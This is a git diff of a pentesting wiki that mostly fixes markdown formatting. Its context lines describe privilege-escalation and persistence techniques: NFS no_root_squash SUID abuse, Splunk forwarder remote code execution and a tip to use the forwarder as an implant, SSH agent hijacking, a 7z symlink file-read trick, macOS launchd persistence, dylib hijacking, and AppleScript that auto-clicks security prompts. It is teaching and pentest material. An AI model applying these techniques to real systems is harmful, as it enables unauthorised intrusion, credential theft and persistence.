-* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID **rights, and **execute from the victim** machine that binary (you can find here some[ C SUID payloads](payloads-to-execute.md#c)).
+* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID** rights, and **execute from the victim** machine that binary (you can find here some[ C SUID payloads](payloads-to-execute.md#c)).
 
 ```bash
 #Attacker, as root user
@@ -47,12 +47,12 @@ cd <SHAREDD_FOLDER>
 
 {% hint style="info" %}
 Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.\
-The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit **and you will need to** abuse this trick**.\
-Another required requirement for the exploit to work is that** the export inside `/etc/export`** **must be using the `insecure` flag**.\
+The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit** and you will need to **abuse this trick**.\
+Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.\
 \--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_--
 {% endhint %}
 
-**Trick copied from **[**https://www.errno.fr/nfs_privesc.html**](https://www.errno.fr/nfs_privesc.html)****
+**Trick copied from** [**https://www.errno.fr/nfs\_privesc.html**](https://www.errno.fr/nfs\_privesc.html)****
 
 Now, let’s assume that the share server still runs `no_root_squash` but there is something preventing us from mounting the share on our pentest machine. This would happen if the `/etc/exports` has an explicit list of IP addresses allowed to mount the share.
 
@@ -70,7 +70,7 @@ This exploit relies on a problem in the NFSv3 specification that mandates that i
 
 Here’s a [library that lets you do just that](https://github.com/sahlberg/libnfs).
 
-#### Compiling the example <a href="compiling-the-example" id="compiling-the-example"></a>
+#### Compiling the example <a href="#compiling-the-example" id="compiling-the-example"></a>
 
 Depending on your kernel, you might need to adapt the example. In my case I had to comment out the fallocate syscalls.
 
@@ -81,7 +81,7 @@ make
 gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
 ```
 
-#### Exploiting using the library <a href="exploiting-using-the-library" id="exploiting-using-the-library"></a>
+#### Exploiting using the library <a href="#exploiting-using-the-library" id="exploiting-using-the-library"></a>
 
 Let’s use the simplest of exploits:
 
@@ -109,7 +109,7 @@ All that’s left is to launch it:
 
 There we are, local root privilege escalation!
 
-### Bonus NFShell <a href="bonus-nfshell" id="bonus-nfshell"></a>
+### Bonus NFShell <a href="#bonus-nfshell" id="bonus-nfshell"></a>
 
 Once local root on the machine, I wanted to loot the NFS share for possible secrets that would let me pivot. But there were many users of the share all with their own uids that I couldn’t read despite being root because of the uid mismatch. I didn’t want to leave obvious traces such as a chown -R, so I rolled a little snippet to set my uid prior to running the desired shell command:
 
diff --git a/linux-unix/privilege-escalation/runc-privilege-escalation.md b/linux-unix/privilege-escalation/runc-privilege-escalation.md
index b6866aef..c885c958 100644
--- a/linux-unix/privilege-escalation/runc-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/runc-privilege-escalation.md
@@ -2,7 +2,7 @@
 
 ## Basic information
 
-If you want to learn more about **runc **check the following page:
+If you want to learn more about **runc** check the following page:
 
 {% content-ref url="../../pentesting/2375-pentesting-docker.md" %}
 [2375-pentesting-docker.md](../../pentesting/2375-pentesting-docker.md)
diff --git a/linux-unix/privilege-escalation/socket-command-injection.md b/linux-unix/privilege-escalation/socket-command-injection.md
index 0108d289..6f446a70 100644
--- a/linux-unix/privilege-escalation/socket-command-injection.md
+++ b/linux-unix/privilege-escalation/socket-command-injection.md
@@ -2,7 +2,7 @@
 
 ### Socket binding example with Python
 
-In the following example a **unix socket is created** (`/tmp/socket_test.s`) and everything **received **is going to be **executed **by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible.
+In the following example a **unix socket is created** (`/tmp/socket_test.s`) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible.
 
 {% code title="s.py" %}
 ```python
@@ -28,7 +28,7 @@ while True:
 ```
 {% endcode %}
 
-**Execute **the code using python: `python s.py` and **check how the socket is listening**:
+**Execute** the code using python: `python s.py` and **check how the socket is listening**:
 
 ```python
 netstat -a -p --unix | grep "socket_test"
diff --git a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md
index bbe2ac89..e238d54b 100644
--- a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md
+++ b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md
@@ -1,18 +1,18 @@
 # Splunk LPE and Persistence
 
-If **enumerating **a machine **internally** or **externally **you find **Splunk running** (port 8090), if you luckily know any **valid credentials** you can **abuse the Splunk service** to **execute a shell** as the user running Splunk. If root is running it, you can escalate privileges to root.
+If **enumerating** a machine **internally** or **externally** you find **Splunk running** (port 8090), if you luckily know any **valid credentials** you can **abuse the Splunk service** to **execute a shell** as the user running Splunk. If root is running it, you can escalate privileges to root.
 
-Also if you are **already root and the Splunk service is not listening only on localhost**, you can **steal **the **password **file **from **the Splunk service and **crack **the passwords, or **add new **credentials to it. And maintain persistence on the host.
+Also if you are **already root and the Splunk service is not listening only on localhost**, you can **steal** the **password** file **from** the Splunk service and **crack** the passwords, or **add new** credentials to it. And maintain persistence on the host.
 
 In the first  image below you can see how a Splunkd web page looks like.
 
-**The following information was copied from **[**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)****
+**The following information was copied from** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)****
 
 ## Abusing Splunk Forwarders For Shells and Persistence
 
 14 Aug 2020
 
-### Description: <a href="description" id="description"></a>
+### Description: <a href="#description" id="description"></a>
 
 The Splunk Universal Forwarder Agent (UF) allows authenticated remote users to send single commands or scripts to the agents through the Splunk API. The UF agent doesn’t validate connections coming are coming from a valid Splunk Enterprise server, nor does the UF agent validate the code is signed or otherwise proven to be from the Splunk Enterprise server. This allows an attacker who gains access to the UF agent password to run arbitrary code on the server as SYSTEM or root, depending on the operating system.
 
@@ -20,7 +20,7 @@ This attack is being used by Penetration Testers and is likely being actively ex
 
 Splunk UF passwords are relatively easy to acquire, see the secion Common Password Locations for details.
 
-### Context: <a href="context" id="context"></a>
+### Context: <a href="#context" id="context"></a>
 
 Splunk is a data aggregation and search tool often used as a Security Information and Event Monitoring (SIEM) system. Splunk Enterprise Server is a web application which runs on a server, with agents, called Universal Forwarders, which are installed on every system in the network. Splunk provides agent binaries for Windows, Linux, Mac, and Unix. Many organizations use Syslog to send data to Splunk instead of installing an agent on Linux/Unix hosts but agent installation is becomming increasingly popular.
 
@@ -30,7 +30,7 @@ Universal Forwarder is accessible on each host at https://host:8089. Accessing a
 
 Splunk documentaiton shows using the same Universal Forwarding password for all agents, I don’t remember for sure if this is a requirement or if individual passwords can be set for each agent, but based on documentaiton and memory from when I was a Splunk admin, I believe all agents must use the same password. This means if the password is found or cracked on one system, it is likely to work on all Splunk UF hosts. This has been my personal experience, allowing compromise of hundreds of hosts quickly.
 
-### Common Password Locations <a href="common-password-locations" id="common-password-locations"></a>
+### Common Password Locations <a href="#common-password-locations" id="common-password-locations"></a>
 
 I often find the Splunk Universal Forwarding agent plain text password in the following locations on networks:
 
@@ -40,7 +40,7 @@ I often find the Splunk Universal Forwarding agent plain text password in the fo
 
 The password can also be accessed in hashed form in Program Files\Splunk\etc\passwd on Windows hosts, and in /opt/Splunk/etc/passwd on Linux and Unix hosts. An attacker can attempt to crack the password using Hashcat, or rent a cloud cracking environment to increase liklihood of cracking the hash. The password is a strong SHA-256 hash and as such a strong, random password is unlikely to be cracked.
 
-### Impact: <a href="impact" id="impact"></a>
+### Impact: <a href="#impact" id="impact"></a>
 
 An attacker with a Splunk Universal Forward Agent password can fully compromise all Splunk hosts in the network and gain SYSTEM or root level permissions on each host. I have successfully used the Splunk agent on Windows, Linux, and Solaris Unix hosts. This vulnerability could allow system credentials to be dumped, sensitive data to be exfiltrated, or ransomware to be installed. This vulnerability is fast, easy to use, and reliable.
 
@@ -50,7 +50,7 @@ Splunk Universal Forwarder is often seen installed on Domain Controllers for log
 
 Finally, the Universal Forwarding Agent does not require a license, and can be configured with a password stand alone. As such an attacker can install Universal Forwarder as a backdoor persistence mechanism on hosts, since it is a legitimate application which customers, even those who do not use Splunk, are not likely to remove.
 
-### Evidence: <a href="evidence" id="evidence"></a>
+### Evidence: <a href="#evidence" id="evidence"></a>
 
 To show an exploitation example I set up a test environment using the latest Splunk version for both the Enterprise Server and the Universal Forwarding agent. A total of 10 images have been attached to this report, showing the following:
 
@@ -114,7 +114,7 @@ Attacker:192.168.42.51
 Splunk Enterprise version: 8.0.5 (latest as of August 12, 2020 – day of lab setup)\
 Universal Forwarder version: 8.0.5 (latest as of August 12, 2020 – day of lab setup)
 
-#### Remediation Recommendation’s for Splunk, Inc: <a href="remediation-recommendations-for-splunk-inc" id="remediation-recommendations-for-splunk-inc"></a>
+#### Remediation Recommendation’s for Splunk, Inc: <a href="#remediation-recommendations-for-splunk-inc" id="remediation-recommendations-for-splunk-inc"></a>
 
 I recommend implementing all of the following solutions to provide defense in depth:
 
@@ -122,16 +122,16 @@ I recommend implementing all of the following solutions to provide defense in de
 2. Enable TLS mutual authentication between the clients and server, using individual keys for each client. This would provide very high bi-directional security between all Splunk services. TLS mutual authentication is being heavily implemented in agents and IoT devices, this is the future of trusted device client to server communication.
 3. Send all code, single line or script files, in a compressed file which is encrypted and signed by the Splunk server. This does not protect the agent data sent through the API, but protects against malicious Remote Code Execution from a 3rd party.
 
-#### Remediation Recommendation’s for Splunk customers: <a href="remediation-recommendations-for-splunk-customers" id="remediation-recommendations-for-splunk-customers"></a>
+#### Remediation Recommendation’s for Splunk customers: <a href="#remediation-recommendations-for-splunk-customers" id="remediation-recommendations-for-splunk-customers"></a>
 
 1. Ensure a very strong password is set for Splunk agents. I recommend at least a 15-character random password, but since these passwords are never typed this could be set to a very large password such as 50 characters.
 2. Configure host based firewalls to only allow connections to port 8089/TCP (Universal Forwarder Agent’s port) from the Splunk server.
 
-### Recommendations for Red Team: <a href="recommendations-for-red-team" id="recommendations-for-red-team"></a>
+### Recommendations for Red Team: <a href="#recommendations-for-red-team" id="recommendations-for-red-team"></a>
 
 1. Download a copy of Splunk Universal Forwarder for each operating system, as it is a great light weight signed implant. Good to keep a copy incase Splunk actually fixes this.
 
-### Exploits/Blogs from other researchers <a href="exploitsblogs-from-other-researchers" id="exploitsblogs-from-other-researchers"></a>
+### Exploits/Blogs from other researchers <a href="#exploitsblogs-from-other-researchers" id="exploitsblogs-from-other-researchers"></a>
 
 Usable public exploits:
 
diff --git a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
index 1e86400c..c5f02dcc 100644
--- a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
+++ b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
@@ -8,7 +8,7 @@ What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.s
 ForwardAgent yes
 ```
 
-If you are root inside the machine you can probably **access any ssh connection made by any agent** that you can find in the_ /tmp_ directory
+If you are root inside the machine you can probably **access any ssh connection made by any agent** that you can find in the _/tmp_ directory
 
 Impersonate Bob using one of Bob's ssh-agent:
 
@@ -26,7 +26,7 @@ Another option, is that the user owner of the agent and root may be able to acce
 
 ## Long explanation and exploitation
 
-**Taken from: **[**https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking/)****
+**Taken from:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/)****
 
 ### **When ForwardAgent Can’t Be Trusted**
 
@@ -46,7 +46,7 @@ A much safer authentication method is [public key authentication](http://www.ibm
 
 The private key is valuable and must be protected, so by default it is stored in an encrypted format. Unfortunately this means entering your encryption passphrase before using it. Many articles suggest using passphrase-less (unencrypted) private keys to avoid this inconvenience. That’s a bad idea, as anyone with access to your workstation (via physical access, theft, or hackery) now also has free access to any computers configured with your public key.
 
-OpenSSH includes [ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent), a daemon that runs on your local workstation. It loads a decrypted copy of your private key into memory, so you only have to enter your passphrase once. It then provides a local [socket](http://en.wikipedia.org/wiki/Unix_domain_socket) that the ssh client can use to ask it to decrypt the encrypted message sent back by the remote server. Your private key stays safely ensconced in the ssh-agent process’ memory while still allowing you to ssh around without typing in passwords.
+OpenSSH includes [ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent), a daemon that runs on your local workstation. It loads a decrypted copy of your private key into memory, so you only have to enter your passphrase once. It then provides a local [socket](http://en.wikipedia.org/wiki/Unix\_domain\_socket) that the ssh client can use to ask it to decrypt the encrypted message sent back by the remote server. Your private key stays safely ensconced in the ssh-agent process’ memory while still allowing you to ssh around without typing in passwords.
 
 ### **How ForwardAgent Works**
 
@@ -56,7 +56,7 @@ Many tasks require “chaining” ssh sessions. Consider my example from earlier
 
 Simply put, anyone with root privilege on the the intermediate server can make free use of your ssh-agent to authenticate them to other servers. A simple demonstration shows how trivially this can be done. Hostnames and usernames have been changed to protect the innocent.
 
-My laptop is running ssh-agent, which communicates with the ssh client programs via a socket. The path to this socket is stored in the SSH_AUTH_SOCK environment variable:
+My laptop is running ssh-agent, which communicates with the ssh client programs via a socket. The path to this socket is stored in the SSH\_AUTH\_SOCK environment variable:
 
 ```
 mylaptop:~ env|grep SSH_AUTH_SOCK
diff --git a/linux-unix/privilege-escalation/wildcards-spare-tricks.md b/linux-unix/privilege-escalation/wildcards-spare-tricks.md
index ab21e043..b0a13c21 100644
--- a/linux-unix/privilege-escalation/wildcards-spare-tricks.md
+++ b/linux-unix/privilege-escalation/wildcards-spare-tricks.md
@@ -49,7 +49,7 @@ In **7z** even using `--` before `*` (note that `--` means that the following in
 7za a /backup/$filename.zip -t7z -snl -p$pass -- *
 ```
 
-And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a **symlink **to the file you want to read:
+And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a **symlink** to the file you want to read:
 
 ```bash
 cd /path/to/7z/acting/folder
@@ -57,8 +57,8 @@ touch @root.txt
 ln -s /file/you/want/to/read root.txt
 ```
 
-Then, when **7z **is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error **showing the content.
+Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content.
 
-_More info in Write-ups of the box CTF from HackTheBox. _
+_More info in Write-ups of the box CTF from HackTheBox._&#x20;
 
 __
diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index e19095e6..810cb2d2 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -128,7 +128,7 @@ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
 
 ## DNS data exfiltration
 
-You could use **burpcollab** or [**pingb**](http://pingb.in)** **for example.
+You could use **burpcollab** or [**pingb**](http://pingb.in) **** for example.
 
 ## Polyglot command injection
 
diff --git a/macos/macos-security-and-privilege-escalation/README.md b/macos/macos-security-and-privilege-escalation/README.md
index f8d1d6fa..37d97093 100644
--- a/macos/macos-security-and-privilege-escalation/README.md
+++ b/macos/macos-security-and-privilege-escalation/README.md
@@ -99,7 +99,7 @@ ls -RAle / 2>/dev/null | grep -E -B1 "\d: "
 
 ### Resource Forks or MacOS ADS
 
-This is a way to obtain **Alternate Data Streams in MacOS **machines. You can save content inside an extended attribute called **com.apple.ResourceFork** inside a file by saving it in **file/..namedfork/rsrc**.
+This is a way to obtain **Alternate Data Streams in MacOS** machines. You can save content inside an extended attribute called **com.apple.ResourceFork** inside a file by saving it in **file/..namedfork/rsrc**.
 
 ```bash
 echo "Hello" > a.txt
@@ -186,18 +186,18 @@ printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharin
 
 [**In this talk**](https://www.youtube.com/watch?v=T5xfL9tEg44) Jeremy Brown talks about this protections and a bug that allowed to bypass them.
 
-_**Gatekeeper**_ is designed to ensure that, by default, **only trusted software runs on a user’s Mac**. Gatekeeper is used when a user **downloads** and **opens** an app, a plug-in or an installer package from outside the App Store. Gatekeeper verifies that the software is **signed by** an** identified developer**, is **notarised** by Apple to be **free of known malicious content**, and **hasn’t been altered**. Gatekeeper also **requests user approval **before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.
+_**Gatekeeper**_ is designed to ensure that, by default, **only trusted software runs on a user’s Mac**. Gatekeeper is used when a user **downloads** and **opens** an app, a plug-in or an installer package from outside the App Store. Gatekeeper verifies that the software is **signed by** an **identified developer**, is **notarised** by Apple to be **free of known malicious content**, and **hasn’t been altered**. Gatekeeper also **requests user approval** before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.
 
 ### Notarizing
 
 In order for an **app to be notarised by Apple**, the developer needs to send the app for review. Notarization is **not App Review**. The Apple notary service is an **automated system** that **scans your software for malicious content**, checks for code-signing issues, and returns the results to you quickly. If there are no issues, the notary service generates a ticket for you to staple to your software; the notary service also **publishes that ticket online where Gatekeeper can find it**.
 
-When the user first installs or runs your software, the presence of a ticket (either online or attached to the executable) **tells Gatekeeper that Apple notarized the software**. **Gatekeeper then places descriptive information in the initial launch dialog **indicating that Apple has already checked for malicious content.
+When the user first installs or runs your software, the presence of a ticket (either online or attached to the executable) **tells Gatekeeper that Apple notarized the software**. **Gatekeeper then places descriptive information in the initial launch dialog** indicating that Apple has already checked for malicious content.
 
 ### File Quarantine
 
 Gatekeeper builds upon **File Quarantine.**\
-****Upon download of an application, a particular **extended file attribute** ("quarantine flag") can be **added** to the **downloaded** **file**. This attribute** is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software.\
+****Upon download of an application, a particular **extended file attribute** ("quarantine flag") can be **added** to the **downloaded** **file**. This attribute **is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software.\
 When a user executes a "quarantined" file, **Gatekeeper** is the one that **performs the mentioned actions** to allow the execution of the file.
 
 {% hint style="info" %}
@@ -257,7 +257,7 @@ find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; pri
 
 ### XProtect
 
-**X-Protect** is also part of Gatekeeper.** It's Apple’s built in malware scanner. **It keeps track of known malware hashes and patterns.\
+**X-Protect** is also part of Gatekeeper. **It's Apple’s built in malware scanner.** It keeps track of known malware hashes and patterns.\
 You can get information about the latest XProtect update running:
 
 ```bash
@@ -270,7 +270,7 @@ Should malware make its way onto a Mac, macOS also includes technology to remedi
 
 ### Automatic Security Updates
 
-Apple issues the **updates for XProtect and MRT automatically **based on the latest threat intelligence available. By default, macOS checks for these updates **daily**. Notarisation updates are distributed using CloudKit sync and are much more frequent.
+Apple issues the **updates for XProtect and MRT automatically** based on the latest threat intelligence available. By default, macOS checks for these updates **daily**. Notarisation updates are distributed using CloudKit sync and are much more frequent.
 
 ### TCC
 
@@ -377,7 +377,7 @@ System Integrity Protection status: enabled.
 ```
 
 If you want to **disable** **it**, you need to put the computer in recovery mode (start it pressing command+R) and execute: `csrutil disable` \
-You can also maintain it **enable but without debugging protections **doing:&#x20;
+You can also maintain it **enable but without debugging protections** doing:&#x20;
 
 ```bash
 csrutil enable --without debug
@@ -385,7 +385,7 @@ csrutil enable --without debug
 
 For more **information about SIP** read the following response: [https://apple.stackexchange.com/questions/193368/what-is-the-rootless-feature-in-el-capitan-really](https://apple.stackexchange.com/questions/193368/what-is-the-rootless-feature-in-el-capitan-really)
 
-This post about a** SIP bypass vulnerability** is also very interesting: [https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/](https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/)
+This post about a **SIP bypass vulnerability** is also very interesting: [https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/](https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/)
 
 ### Apple Binary Signatures
 
@@ -432,7 +432,7 @@ An **ASEP** is a location on the system that could lead to the **execution** of
 
 ### Launchd
 
-**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute **the configurations indicated in the **ASEP** **plists** in:
+**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in:
 
 * `/Library/LaunchAgents`: Per-user agents installed by the admin
 * `/Library/LaunchDaemons`: System-wide daemons installed by the admin
@@ -469,7 +469,7 @@ The **main difference between agents and daemons is that agents are loaded when
 There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. They can be found also in `/Library/LaunchAgents`(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example).
 
 {% hint style="info" %}
-New Daemons or Agents config files will be **loaded after next reboot or using **`launchctl load <target.plist>` It's **also possible to load .plist files without that extension** with `launchctl -F <file>` (however those plist files won't be automatically loaded after reboot).\
+New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load <target.plist>` It's **also possible to load .plist files without that extension** with `launchctl -F <file>` (however those plist files won't be automatically loaded after reboot).\
 It's also possible to **unload** with `launchctl unload <target.plist>` (the process pointed by it will be terminated),
 
 To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist`
@@ -501,7 +501,7 @@ There you can find the regular **cron** **jobs**, the **at** **jobs** (not very
 
 ### kext
 
-In order to install a KEXT as a startup item, it needs to be** installed in one of the following locations**:
+In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**:
 
 * `/System/Library/Extensions`
   * KEXT files built into the OS X operating system.
@@ -522,7 +522,7 @@ For more information about [**kernel extensions check this section**](mac-os-arc
 
 ### **Login Items**
 
-In System Preferences -> Users & Groups -> **Login Items **you can find  **items to be executed when the user logs in**.\
+In System Preferences -> Users & Groups -> **Login Items** you can find  **items to be executed when the user logs in**.\
 It it's possible to list them, add and remove from the command line:
 
 ```bash
@@ -615,7 +615,7 @@ ls -l /private/var/db/emondClients
 
 A **StartupItem** is a **directory** that gets **placed** in one of these two folders. `/Library/StartupItems/` or `/System/Library/StartupItems/`
 
-After placing a new directory in one of these two locations, **two more items **need to be placed inside that directory. These two items are a **rc script** **and a plist** that holds a few settings. This plist must be called “**StartupParameters.plist**”.
+After placing a new directory in one of these two locations, **two more items** need to be placed inside that directory. These two items are a **rc script** **and a plist** that holds a few settings. This plist must be called “**StartupParameters.plist**”.
 
 {% code title="StartupParameters.plist" %}
 ```markup
@@ -663,7 +663,7 @@ RunService "$1"
 **This isn't working in modern MacOS versions**
 {% endhint %}
 
-It's also possible to place here **commands that will be executed at startup. **Example os regular rc.common script:
+It's also possible to place here **commands that will be executed at startup.** Example os regular rc.common script:
 
 ```bash
 ##
@@ -941,18 +941,18 @@ This makes the password pretty easy to recover, for example using scripts like [
 As in Windows, in MacOS you can also **hijack dylibs** to make **applications** **execute** **arbitrary** **code**.\
 However, the way **MacOS** applications **load** libraries is **more restricted** than in Windows. This implies that **malware** developers can still use this technique for **stealth**, but the probably to be able to **abuse this to escalate privileges is much lower**.
 
-First of all, is **more common **to find that **MacOS binaries indicates the full path** to the libraries to load. And second, **MacOS never search** in the folders of the **$PATH **for libraries.
+First of all, is **more common** to find that **MacOS binaries indicates the full path** to the libraries to load. And second, **MacOS never search** in the folders of the **$PATH** for libraries.
 
 However, there are 2 types of dylib hijacking:
 
 * **Missing weak linked libraries**: This means that the application will try to load a library that doesn't exist configured with **LC\_LOAD\_WEAK\_DYLIB**. Then, **if an attacker places a dylib where it's expected it will be loaded**.
   * The fact that the link is "weak" means that the application will continue running even if the library isn't found.
-* **Configured with @rpath**: The path to the library configured contains "**@rpath**" and it's configured with **multiple** **LC\_RPATH** containing **paths**. Therefore, **when loading **the dylib, the loader is going to **search** (in order)** through all the paths** specified in the **LC\_RPATH** **configurations**. If anyone is missing and **an attacker can place a dylib there** and it will be loaded.
+* **Configured with @rpath**: The path to the library configured contains "**@rpath**" and it's configured with **multiple** **LC\_RPATH** containing **paths**. Therefore, **when loading** the dylib, the loader is going to **search** (in order) **through all the paths** specified in the **LC\_RPATH** **configurations**. If anyone is missing and **an attacker can place a dylib there** and it will be loaded.
 
 The way to **escalate privileges** abusing this functionality would be in the rare case that an **application** being executed **by** **root** is **looking** for some **library in some folder where the attacker has write permissions.**
 
-**A nice scanner to find missing libraries in applications is **[**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html)** or a **[**CLI version**](https://github.com/pandazheng/DylibHijack)**.**\
-**A nice report with technical details about this technique can be found **[**here**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x)**.**
+**A nice scanner to find missing libraries in applications is** [**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html) **or a** [**CLI version**](https://github.com/pandazheng/DylibHijack)**.**\
+**A nice report with technical details about this technique can be found** [**here**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x)**.**
 
 ### **DYLD\_INSERT\_LIBRARIES**
 
@@ -960,10 +960,10 @@ The way to **escalate privileges** abusing this functionality would be in the ra
 
 This is like the [**LD\_PRELOAD on Linux**](../../linux-unix/privilege-escalation/#ld\_preload).
 
-This technique may be also** used as an ASEP technique** as every application installed has a plist called "Info.plist" that allows for the **assigning of environmental variables** using a key called `LSEnvironmental`.
+This technique may be also **used as an ASEP technique** as every application installed has a plist called "Info.plist" that allows for the **assigning of environmental variables** using a key called `LSEnvironmental`.
 
 {% hint style="info" %}
-Since 2012 when [OSX.FlashBack.B](https://www.f-secure.com/v-descs/trojan-downloader\_osx\_flashback\_b.shtml) \[22] abused this technique, **Apple has drastically reduced the “power” **of the DYLD\_INSERT\_LIBRARIES.&#x20;
+Since 2012 when [OSX.FlashBack.B](https://www.f-secure.com/v-descs/trojan-downloader\_osx\_flashback\_b.shtml) \[22] abused this technique, **Apple has drastically reduced the “power”** of the DYLD\_INSERT\_LIBRARIES.&#x20;
 
 For example the dynamic loader (dyld) ignores the DYLD\_INSERT\_LIBRARIES environment variable in a wide range of cases, such as setuid and platform binaries. And, starting with macOS Catalina, only 3rd-party applications that are not compiled with the hardened runtime (which “protects the runtime integrity of software” \[22]), or have an exception such as the com.apple.security.cs.allow-dyld-environment-variables entitlement) are susceptible to dylib insertions.&#x20;
 
@@ -986,7 +986,7 @@ sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
 
 You can find the Notifications data in `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/`
 
-Most of the interesting information is going to be in **blob**. So you will need to **extract** that content and **transform** it to **human** **readable **or use **`strings`**. To access it you can do:
+Most of the interesting information is going to be in **blob**. So you will need to **extract** that content and **transform** it to **human** **readable** or use **`strings`**. To access it you can do:
 
 ```bash
 cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
@@ -1057,8 +1057,8 @@ grep -A3 CFBundleTypeExtensions Info.plist  | grep string
 
 ## Apple Scripts
 
-It's a scripting language used for task automation** interacting with remote processes**. It makes pretty easy to **ask other processes to perform some actions**. **Malware** may abuse these features to abuse functions exported by other processes.\
-For example, a malware could **inject arbitrary JS code in browser opened pages**. Or **auto click **some allow permissions requested to the user;
+It's a scripting language used for task automation **interacting with remote processes**. It makes pretty easy to **ask other processes to perform some actions**. **Malware** may abuse these features to abuse functions exported by other processes.\
+For example, a malware could **inject arbitrary JS code in browser opened pages**. Or **auto click** some allow permissions requested to the user;
 
 ```bash
 tell window 1 of process “SecurityAgent” 
@@ -1071,7 +1071,7 @@ Find more info about malware using applescripts [**here**](https://www.sentinelo
 
 Apple scripts may be easily "**compiled**". These versions can be easily "**decompiled**" with `osadecompile`
 
-However, this scripts can also be** exported as "Read only" **(via the "Export..." option):
+However, this scripts can also be **exported as "Read only"** (via the "Export..." option):
 
 ![](<../../.gitbook/assets/image (556).png>)
 
diff --git a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md
index 5ff5d956..f2693fb7 100644
--- a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md
+++ b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md
@@ -10,7 +10,7 @@ From a security researcher’s perspective, **Mac OS X feels just like a FreeBSD
 
 ### Mach
 
